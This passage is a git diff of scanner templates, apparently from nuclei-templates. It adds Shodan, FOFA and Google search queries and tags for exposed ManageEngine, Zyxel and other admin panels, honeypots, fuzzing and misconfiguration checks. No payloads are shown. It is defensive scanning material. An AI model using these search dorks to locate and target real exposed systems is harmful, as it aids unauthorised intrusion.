product: manageengine_adselfservice_plus + shodan-query: + - http.title:"ADSelfService Plus" + - http.title:"adselfservice plus" + - http.title:"manageengine" + fofa-query: + - title="adselfservice plus" + - title="manageengine" + google-query: + - intitle:"adselfservice plus" + - intitle:"manageengine" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-analytics.yaml b/http/exposed-panels/zoho/manageengine-analytics.yaml index 243c09b5d0..46e89181b2 100644 --- a/http/exposed-panels/zoho/manageengine-analytics.yaml +++ b/http/exposed-panels/zoho/manageengine-analytics.yaml @@ -10,10 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zohocorp:manageengine_analytics_plus:*:*:*:*:*:*:*:* metadata: - fofa-query: app="ZOHO-流量管理" max-request: 1 - product: manageengine_analytics_plus vendor: zohocorp + product: manageengine_analytics_plus + fofa-query: + - app="ZOHO-流量管理" + - app="zoho-流量管理" + - title="apex it help desk" + shodan-query: http.title:"apex it help desk" + google-query: intitle:"apex it help desk" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml b/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml index f7f37638fb..b059bf9028 100644 --- a/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml +++ b/http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml @@ -11,9 +11,15 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_analytics_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_analytics_plus - shodan-query: http.title:"APEX IT Help Desk" vendor: zohocorp + product: manageengine_analytics_plus + shodan-query: + - http.title:"APEX IT Help Desk" + - http.title:"apex it help desk" + fofa-query: + - app="zoho-流量管理" + - title="apex it help desk" + google-query: intitle:"apex it help desk" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-applications-manager.yaml b/http/exposed-panels/zoho/manageengine-applications-manager.yaml index a1228a5e92..2e2cb5326e 100644 --- a/http/exposed-panels/zoho/manageengine-applications-manager.yaml +++ b/http/exposed-panels/zoho/manageengine-applications-manager.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_applications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_applications_manager vendor: zohocorp + product: manageengine_applications_manager tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-assetexplorer.yaml b/http/exposed-panels/zoho/manageengine-assetexplorer.yaml index 7f67a3c494..7f4579dec3 100644 --- a/http/exposed-panels/zoho/manageengine-assetexplorer.yaml +++ b/http/exposed-panels/zoho/manageengine-assetexplorer.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_assetexplorer:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_assetexplorer - shodan-query: http.title:"ManageEngine AssetExplorer" vendor: zohocorp + product: manageengine_assetexplorer + shodan-query: + - http.title:"ManageEngine AssetExplorer" + - http.title:"manageengine assetexplorer" + fofa-query: title="manageengine assetexplorer" + google-query: intitle:"manageengine assetexplorer" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-desktop.yaml b/http/exposed-panels/zoho/manageengine-desktop.yaml index 604f338f4f..e5fa1e3801 100644 --- a/http/exposed-panels/zoho/manageengine-desktop.yaml +++ b/http/exposed-panels/zoho/manageengine-desktop.yaml @@ -11,9 +11,15 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_desktop_central - shodan-query: http.title:"ManageEngine Desktop Central 10" vendor: zohocorp + product: manageengine_desktop_central + shodan-query: + - http.title:"ManageEngine Desktop Central 10" + - http.title:"manageengine desktop central 10" + fofa-query: + - title="manageengine desktop central 10" + - app="zoho-manageengine-desktop" + google-query: intitle:"manageengine desktop central 10" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-network-config.yaml b/http/exposed-panels/zoho/manageengine-network-config.yaml index da719f577c..eb89d86b7a 100644 --- a/http/exposed-panels/zoho/manageengine-network-config.yaml +++ b/http/exposed-panels/zoho/manageengine-network-config.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: manageengine_network_configuration_manager - shodan-query: http.title:"Network Configuration Manager" - vendor: zohocorp verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_network_configuration_manager + shodan-query: + - http.title:"Network Configuration Manager" + - http.title:"network configuration manager" + fofa-query: title="network configuration manager" + google-query: intitle:"network configuration manager" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-opmanager.yaml b/http/exposed-panels/zoho/manageengine-opmanager.yaml index cc8ccf461f..0c777e9932 100644 --- a/http/exposed-panels/zoho/manageengine-opmanager.yaml +++ b/http/exposed-panels/zoho/manageengine-opmanager.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_opmanager - shodan-query: http.title:"OpManager Plus" vendor: zohocorp + product: manageengine_opmanager + shodan-query: + - http.title:"OpManager Plus" + - http.title:"opmanager plus" + fofa-query: title="opmanager plus" + google-query: intitle:"opmanager plus" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-servicedesk.yaml b/http/exposed-panels/zoho/manageengine-servicedesk.yaml index 9d0cc51280..027122746a 100644 --- a/http/exposed-panels/zoho/manageengine-servicedesk.yaml +++ b/http/exposed-panels/zoho/manageengine-servicedesk.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_servicedesk_plus - shodan-query: http.title:"ManageEngine ServiceDesk Plus" vendor: zohocorp + product: manageengine_servicedesk_plus + shodan-query: + - http.title:"ManageEngine ServiceDesk Plus" + - http.title:"manageengine servicedesk plus" + fofa-query: title="manageengine servicedesk plus" + google-query: intitle:"manageengine servicedesk plus" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoho/manageengine-supportcenter.yaml b/http/exposed-panels/zoho/manageengine-supportcenter.yaml index 6e98304342..ab6c4b7b58 100644 --- a/http/exposed-panels/zoho/manageengine-supportcenter.yaml +++ b/http/exposed-panels/zoho/manageengine-supportcenter.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: manageengine_supportcenter_plus - shodan-query: http.title:"ManageEngine SupportCenter Plus" vendor: zohocorp + product: manageengine_supportcenter_plus + shodan-query: + - http.title:"ManageEngine SupportCenter Plus" + - http.title:"manageengine supportcenter plus" + fofa-query: title="manageengine supportcenter plus" + google-query: intitle:"manageengine supportcenter plus" tags: panel,zoho,manageengine,zohocorp http: diff --git a/http/exposed-panels/zoneminder-login.yaml b/http/exposed-panels/zoneminder-login.yaml index 0bfaba5d20..71933fb35b 100644 --- a/http/exposed-panels/zoneminder-login.yaml +++ b/http/exposed-panels/zoneminder-login.yaml @@ -11,8 +11,10 @@ info: cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: zoneminder vendor: zoneminder + product: zoneminder + shodan-query: http.html:"zm - login" + fofa-query: body="zm - login" tags: panel,zoneminder http: diff --git a/http/exposed-panels/zte-panel.yaml b/http/exposed-panels/zte-panel.yaml index 5826ede43b..cf694cf1e1 100644 --- a/http/exposed-panels/zte-panel.yaml +++ b/http/exposed-panels/zte-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"ZTE Corporation" - verified: true tags: panel,zte http: diff --git a/http/exposed-panels/zyxel-router-panel.yaml b/http/exposed-panels/zyxel-router-panel.yaml index 71d7f19ef8..18298e34c0 100644 --- a/http/exposed-panels/zyxel-router-panel.yaml +++ b/http/exposed-panels/zyxel-router-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:zyxel:nr5101:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: nr5101 - shodan-query: title:"Web-Based Configurator" html:"zyxel" - vendor: zyxel verified: true + max-request: 2 + vendor: zyxel + product: nr5101 + shodan-query: + - title:"Web-Based Configurator" html:"zyxel" + - http.title:"web-based configurator" html:"zyxel" + fofa-query: title="web-based configurator" html:"zyxel" + google-query: intitle:"web-based configurator" html:"zyxel" tags: panel,zyxel,router,iot http: diff --git a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml index fe856ff034..de2fd1c4a4 100644 --- a/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml +++ b/http/exposed-panels/zyxel/zyxel-firewall-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-440644339 - verified: true tags: panel,xyxel,firewall http: diff --git a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml index 3b2885a1d8..11a5875c58 100644 --- a/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml @@ -7,11 +7,14 @@ info: classification: cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: vmg1312-b10d_firmware - shodan-query: http.html:"VMG1312-B10D" - vendor: zyxel verified: true + max-request: 1 + vendor: zyxel + product: vmg1312-b10d_firmware + shodan-query: + - http.html:"VMG1312-B10D" + - http.html:"vmg1312-b10d" + fofa-query: body="vmg1312-b10d" tags: tech,zyxel,modem,router,panel http: diff --git a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml index 28b8bff696..9414b917bb 100644 --- a/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml +++ b/http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml @@ -5,9 +5,9 @@ info: author: princechaddha severity: info metadata: + verified: true max-request: 1 shodan-query: http.html:"VSG1432-B101" - verified: true tags: tech,zyxel,modem,router,panel http: diff --git a/http/exposures/apis/drupal-jsonapi-user-listing.yaml b/http/exposures/apis/drupal-jsonapi-user-listing.yaml index 309c6b3ac0..dd00ee2288 100644 --- a/http/exposures/apis/drupal-jsonapi-user-listing.yaml +++ b/http/exposures/apis/drupal-jsonapi-user-listing.yaml @@ -14,7 +14,11 @@ info: metadata: verified: true max-request: 1 - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" + product: drupal + vendor: drupal tags: drupal,exposure http: diff --git a/http/exposures/configs/deployment-ini.yaml b/http/exposures/configs/deployment-ini.yaml index fe82b4ba98..928e1ca110 100644 --- a/http/exposures/configs/deployment-ini.yaml +++ b/http/exposures/configs/deployment-ini.yaml @@ -7,13 +7,14 @@ info: description: | Config file for "FTP deployment" utility usually contains server's FTP credentials in plain text. remediation: | - Delete the config file from server & add it to `ignore` section of the deployment file. Or block access to the file using `.htaccess` on the server. + Delete the config file from server & add it to `ignore` section of the deployment file. Or block access to the file using `.htaccess` on the server. reference: - https://github.com/dg/ftp-deployment metadata: + max-request: 12 vendor: dg - product: ftp-deployment - tags: config,exposure + product: "ftp-deployment" + tags: config,exposure,dg http: - method: GET diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 5d26689d69..b1e884bb52 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -43,7 +43,7 @@ info: cvss-score: 7.5 metadata: max-request: 89 - tags: files,database,exposure,sqlite,sqlite3,fuzz + tags: files,database,exposure,sqlite,sqlite3,fuzz,sqli http: - method: GET diff --git a/http/exposures/files/ht-deployment.yaml b/http/exposures/files/ht-deployment.yaml index 899a54e4f8..0ce2449f51 100644 --- a/http/exposures/files/ht-deployment.yaml +++ b/http/exposures/files/ht-deployment.yaml @@ -15,10 +15,10 @@ info: cvss-score: 7.5 metadata: verified: true + max-request: 2 vendor: dg product: ftp-deployment - max-request: 2 - tags: files,exposure,php,deployment,cache + tags: files,exposure,php,deployment,cache,dg http: - method: GET diff --git a/http/exposures/files/wordpress-readme-file.yaml b/http/exposures/files/wordpress-readme-file.yaml index 0a0e6b8abf..7d564bff2e 100644 --- a/http/exposures/files/wordpress-readme-file.yaml +++ b/http/exposures/files/wordpress-readme-file.yaml @@ -7,7 +7,11 @@ info: metadata: verified: true max-request: 3 - shodan-query: http.component:"wordpress" + shodan-query: + - http.component:"wordpress" + - cpe:"cpe:2.3:a:wordpress:wordpress" + product: wordpress + vendor: wordpress tags: exposure,wordpress,wp,readme,files http: diff --git a/http/exposures/logs/milesight-system-log.yaml b/http/exposures/logs/milesight-system-log.yaml index e916e6b72e..fd92776987 100644 --- a/http/exposures/logs/milesight-system-log.yaml +++ b/http/exposures/logs/milesight-system-log.yaml @@ -13,6 +13,9 @@ info: max-request: 1 shodan-query: http.html:rt_title google-query: '"/lang/log/system" ext:log' + product: ur5x_firmware + vendor: milesight + fofa-query: body=rt_title tags: milesight,log,exposure http: diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml index df817453b6..29b11d3125 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/cache-poisoning-fuzz.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/web-security/web-cache-poisoning metadata: max-request: 5834 - tags: fuzz,cache + tags: fuzz,cache,fuzzing http: - raw: diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml index 076ec7b5ac..2ad0574ec8 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/header-command-injection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-77 metadata: max-request: 7650 - tags: fuzz,rce + tags: fuzz,rce,fuzzing http: - raw: diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index 743eaa51ed..24c8ea6aa5 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 4 - tags: iis,edb + tags: iis,edb,fuzzing http: - raw: diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml index 42ed0a2bea..94b59ef383 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/linux-lfi-fuzzing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 22 - tags: linux,lfi,fuzz + tags: linux,lfi,fuzz,fuzzing http: - method: GET diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml index 9b67344fe9..f28b352d06 100644 --- a/http/fuzzing/mdb-database-file.yaml +++ b/http/fuzzing/mdb-database-file.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 341 - tags: fuzz,mdb,asp + tags: fuzz,mdb,asp,fuzzing http: - raw: diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml index 4ebddab046..b969caead9 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/prestashop-module-fuzz.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 639 - tags: fuzz,prestashop + tags: fuzz,prestashop,fuzzing http: - raw: diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/ssrf-via-proxy.yaml index f3f8054d16..2dae31844e 100644 --- a/http/fuzzing/ssrf-via-proxy.yaml +++ b/http/fuzzing/ssrf-via-proxy.yaml @@ -10,7 +10,7 @@ info: - https://twitter.com/ImoJOnDz/status/1649089777629827072 metadata: max-request: 9 - tags: ssrf,proxy,oast,fuzz + tags: ssrf,proxy,oast,fuzz,fuzzing http: - payloads: diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/valid-gmail-check.yaml index 3aa02ea47d..9b68aeae8c 100644 --- a/http/fuzzing/valid-gmail-check.yaml +++ b/http/fuzzing/valid-gmail-check.yaml @@ -8,7 +8,7 @@ info: - https://github.com/dievus/geeMailUserFinder metadata: max-request: 1 - tags: gmail + tags: gmail,fuzzing self-contained: true diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/waf-fuzz.yaml index e819d0a080..a4d1de95d3 100644 --- a/http/fuzzing/waf-fuzz.yaml +++ b/http/fuzzing/waf-fuzz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 58 - tags: waf,fuzz + tags: waf,fuzz,fuzzing http: - raw: diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/wordpress-plugins-detect.yaml index 6298ed031b..a9d52b75f8 100644 --- a/http/fuzzing/wordpress-plugins-detect.yaml +++ b/http/fuzzing/wordpress-plugins-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 100563 - tags: fuzz,wordpress + tags: fuzz,wordpress,fuzzing http: - raw: diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/wordpress-themes-detect.yaml index 77ae1d67a0..666c9921eb 100644 --- a/http/fuzzing/wordpress-themes-detect.yaml +++ b/http/fuzzing/wordpress-themes-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 24434 - tags: fuzz,wordpress + tags: fuzz,wordpress,fuzzing http: - raw: diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/wordpress-weak-credentials.yaml index 88409cbd3c..8d81dfaae1 100644 --- a/http/fuzzing/wordpress-weak-credentials.yaml +++ b/http/fuzzing/wordpress-weak-credentials.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-1391 metadata: max-request: 276 - tags: wordpress,default-login,fuzz + tags: wordpress,default-login,fuzz,fuzzing http: - raw: diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/xff-403-bypass.yaml index 9742340fe6..c98f3bd644 100644 --- a/http/fuzzing/xff-403-bypass.yaml +++ b/http/fuzzing/xff-403-bypass.yaml @@ -7,7 +7,7 @@ info: description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. metadata: max-request: 3 - tags: fuzz + tags: fuzz,fuzzing http: - raw: diff --git a/http/honeypot/citrix-honeypot-detect.yaml b/http/honeypot/citrix-honeypot-detect.yaml index 40df55e52c..32c53d1d81 100644 --- a/http/honeypot/citrix-honeypot-detect.yaml +++ b/http/honeypot/citrix-honeypot-detect.yaml @@ -12,7 +12,11 @@ info: max-request: 1 vendor: citrix product: citrix - shodan-query: http.title:“Citrix Login” + shodan-query: + - http.title:“Citrix Login” + - http.title:“citrix login” + fofa-query: title=“citrix login” + google-query: intitle:“citrix login” tags: citrix,honeypot,ir,cti http: diff --git a/http/honeypot/dionaea-http-honeypot-detect.yaml b/http/honeypot/dionaea-http-honeypot-detect.yaml index 5b2257cce5..56a3ffb612 100644 --- a/http/honeypot/dionaea-http-honeypot-detect.yaml +++ b/http/honeypot/dionaea-http-honeypot-detect.yaml @@ -11,6 +11,7 @@ info: max-request: 1 vendor: dionaea product: http + shodan-query: '"python/3.10 aiohttp/3.8.3" && bad status' tags: dionaea,honeypot,ir,cti http: diff --git a/http/honeypot/snare-honeypot-detect.yaml b/http/honeypot/snare-honeypot-detect.yaml index 95bba8d95f..8e2aab0da5 100644 --- a/http/honeypot/snare-honeypot-detect.yaml +++ b/http/honeypot/snare-honeypot-detect.yaml @@ -12,7 +12,9 @@ info: max-request: 1 vendor: snare product: http - shodan-query: '"Python/3.10 aiohttp/3.8.3" && Bad status' + shodan-query: + - '"Python/3.10 aiohttp/3.8.3" && Bad status' + - '"python/3.10 aiohttp/3.8.3" && bad status' tags: snare,honeypot,ir,cti http: diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index 12525a4c18..2a36fbac9e 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -1,15 +1,16 @@ id: tpot-honeypot-detect -info: - name: T-Pot Honeypot - Detect - author: rxerium - severity: info - description: | - A tpot dashboard has been detected - reference: - - https://github.com/telekom-security/tpotce - tags: tpot,honeypot - +info: + name: T-Pot Honeypot - Detect + author: rxerium + severity: info + description: | + A tpot dashboard has been detected + reference: + - https://github.com/telekom-security/tpotce + metadata: + max-request: 1 + tags: tpot,honeypot http: - method: GET path: diff --git a/http/iot/kyocera-printer-panel.yaml b/http/iot/kyocera-printer-panel.yaml index 01c55020bd..4154910605 100644 --- a/http/iot/kyocera-printer-panel.yaml +++ b/http/iot/kyocera-printer-panel.yaml @@ -10,6 +10,9 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-50306417 + product: d-copia253mf_plus_firmware + vendor: kyocera + fofa-query: icon_hash=-50306417 tags: iot,panel,kyocera,printer http: diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 4aabb1a762..a98d7c2e91 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -10,9 +10,9 @@ info: - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md - https://github.com/gobysec/GobyVuls/blob/master/Netgear_Devices_boardDataWW.php_Unauthenticated_Remote_Command_Execution.md metadata: - fofa-query: title=="Netgear" verified: true max-request: 1 + fofa-query: title=="Netgear" tags: rce,netgear,iot http: diff --git a/http/miscellaneous/balada-injector-malware.yaml b/http/miscellaneous/balada-injector-malware.yaml index 43ee22e663..ba19eb97f1 100644 --- a/http/miscellaneous/balada-injector-malware.yaml +++ b/http/miscellaneous/balada-injector-malware.yaml @@ -10,7 +10,7 @@ info: - https://blog.sucuri.net/2024/01/thousands-of-sites-with-popup-builder-compromised-by-balada-injector.html metadata: max-request: 1 - tags: malware,balada,misc + tags: malware,balada,misc,miscellaneous http: - method: GET diff --git a/http/miscellaneous/cloudflare-rocketloader-htmli.yaml b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml index df7dba47b2..b6c6c97fe4 100644 --- a/http/miscellaneous/cloudflare-rocketloader-htmli.yaml +++ b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,cloudflare,htmli + tags: misconfig,cloudflare,htmli,miscellaneous http: - method: GET diff --git a/http/miscellaneous/defacement-detect.yaml b/http/miscellaneous/defacement-detect.yaml index 6d5b6f29c0..21e86e8742 100644 --- a/http/miscellaneous/defacement-detect.yaml +++ b/http/miscellaneous/defacement-detect.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 85 - tags: misc,defacement,spam,hacktivism,fuzz + tags: misc,defacement,spam,hacktivism,fuzz,miscellaneous http: - method: GET diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index e2671e4087..c90cd5c0a5 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -12,8 +12,9 @@ info: reference: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information - https://portswigger.net/kb/issues/00600100_directory-listing - tags: misc,generic,misconfig,fuzz - + metadata: + max-request: 2 + tags: misc,generic,misconfig,fuzz,miscellaneous flow: | function target_is_in_scope(url) { if (url.startsWith(template.http_1_host) || url.startsWith("/")) { diff --git a/http/miscellaneous/form-detection.yaml b/http/miscellaneous/form-detection.yaml index 4c4b623cc2..ef7b6883c5 100644 --- a/http/miscellaneous/form-detection.yaml +++ b/http/miscellaneous/form-detection.yaml @@ -8,7 +8,9 @@ info: A template to detect HTML Forms in page response. reference: - https://github.com/dirtycoder0124/formcrawler - tags: form,misc + metadata: + max-request: 1 + tags: form,misc,miscellaneous http: - method: GET diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml index 6bf4c412b4..69532bad79 100644 --- a/http/miscellaneous/microsoft-azure-error.yaml +++ b/http/miscellaneous/microsoft-azure-error.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Microsoft Azure Web App - Error 404" - tags: error,azure,microsoft,misc,takeover + tags: error,azure,microsoft,misc,takeover,miscellaneous http: - method: GET diff --git a/http/misconfiguration/aws/cdn-cache-poisoning.yaml b/http/misconfiguration/aws/cdn-cache-poisoning.yaml index 667d221e50..fb46c4fa0c 100644 --- a/http/misconfiguration/aws/cdn-cache-poisoning.yaml +++ b/http/misconfiguration/aws/cdn-cache-poisoning.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: X-Amz-Server-Side-Encryption - tags: cache,aws,poisoning,cdn + tags: cache,aws,poisoning,cdn,misconfig variables: string: "{{to_lower(rand_base(8))}}={{to_lower(rand_base(8))}}" diff --git a/http/misconfiguration/corebos-htaccess.yaml b/http/misconfiguration/corebos-htaccess.yaml index 14cdbfe1f8..51043592a1 100644 --- a/http/misconfiguration/corebos-htaccess.yaml +++ b/http/misconfiguration/corebos-htaccess.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 1 shodan-query: http.html:"corebos" + product: corebos + vendor: corebos + fofa-query: body="corebos" tags: exposure,corebos,huntr,misconfig http: diff --git a/http/misconfiguration/dlink-unauth-cgi-script.yaml b/http/misconfiguration/dlink-unauth-cgi-script.yaml index adb7b7392c..90559be330 100644 --- a/http/misconfiguration/dlink-unauth-cgi-script.yaml +++ b/http/misconfiguration/dlink-unauth-cgi-script.yaml @@ -10,7 +10,8 @@ info: - https://github.com/netsecfish/info_cgi metadata: verified: true - fofa-query: app="D_Link-DNS" + max-request: 1 + fofa-query: "app=\"D_Link-DNS\"" tags: unauth,dlink,misconfig http: diff --git a/http/misconfiguration/dont-panic-traceback.yaml b/http/misconfiguration/dont-panic-traceback.yaml index e973ef835a..57fd9e0872 100644 --- a/http/misconfiguration/dont-panic-traceback.yaml +++ b/http/misconfiguration/dont-panic-traceback.yaml @@ -7,8 +7,8 @@ info: description: | DON'T PANIC Traceback was detected. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Debugger" tags: traceback,dont-panic,misconfig diff --git a/http/misconfiguration/doris-dashboard.yaml b/http/misconfiguration/doris-dashboard.yaml index ad10be723e..825e6f44ac 100644 --- a/http/misconfiguration/doris-dashboard.yaml +++ b/http/misconfiguration/doris-dashboard.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:24048806 - tags: doris,exposure,unauth,logs + tags: doris,exposure,unauth,logs,misconfig http: - method: GET diff --git a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml index 393936b11f..9e5b928dec 100644 --- a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml +++ b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml @@ -6,7 +6,11 @@ info: severity: info metadata: max-request: 4 - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" + product: drupal + vendor: drupal tags: drupal,misconfig http: diff --git a/http/misconfiguration/filebrowser-unauth.yaml b/http/misconfiguration/filebrowser-unauth.yaml index 0a9996e7f7..234f519c40 100644 --- a/http/misconfiguration/filebrowser-unauth.yaml +++ b/http/misconfiguration/filebrowser-unauth.yaml @@ -11,6 +11,9 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:1052926265 + product: filebrowser + vendor: filebrowser + fofa-query: icon_hash=1052926265 tags: misconfig,filebrowser,unauth http: diff --git a/http/misconfiguration/genieacs-default-jwt.yaml b/http/misconfiguration/genieacs-default-jwt.yaml index e423a75f66..ba430084e2 100644 --- a/http/misconfiguration/genieacs-default-jwt.yaml +++ b/http/misconfiguration/genieacs-default-jwt.yaml @@ -16,7 +16,12 @@ info: max-request: 1 vendor: genieacs product: genieacs - shodan-query: http.html:"genieacs" + shodan-query: + - http.html:"genieacs" + - http.favicon.hash:-2098066288 + fofa-query: + - body="genieacs" + - icon_hash=-2098066288 tags: misconfig,jwt,genieacs,default-jwt variables: cookie_name: genieacs-ui-jwt diff --git a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml index 3335edb0c3..92d13c0fe3 100644 --- a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml +++ b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"H2O Flow" - tags: h2o-3,h2o,info-leak,lfi + tags: 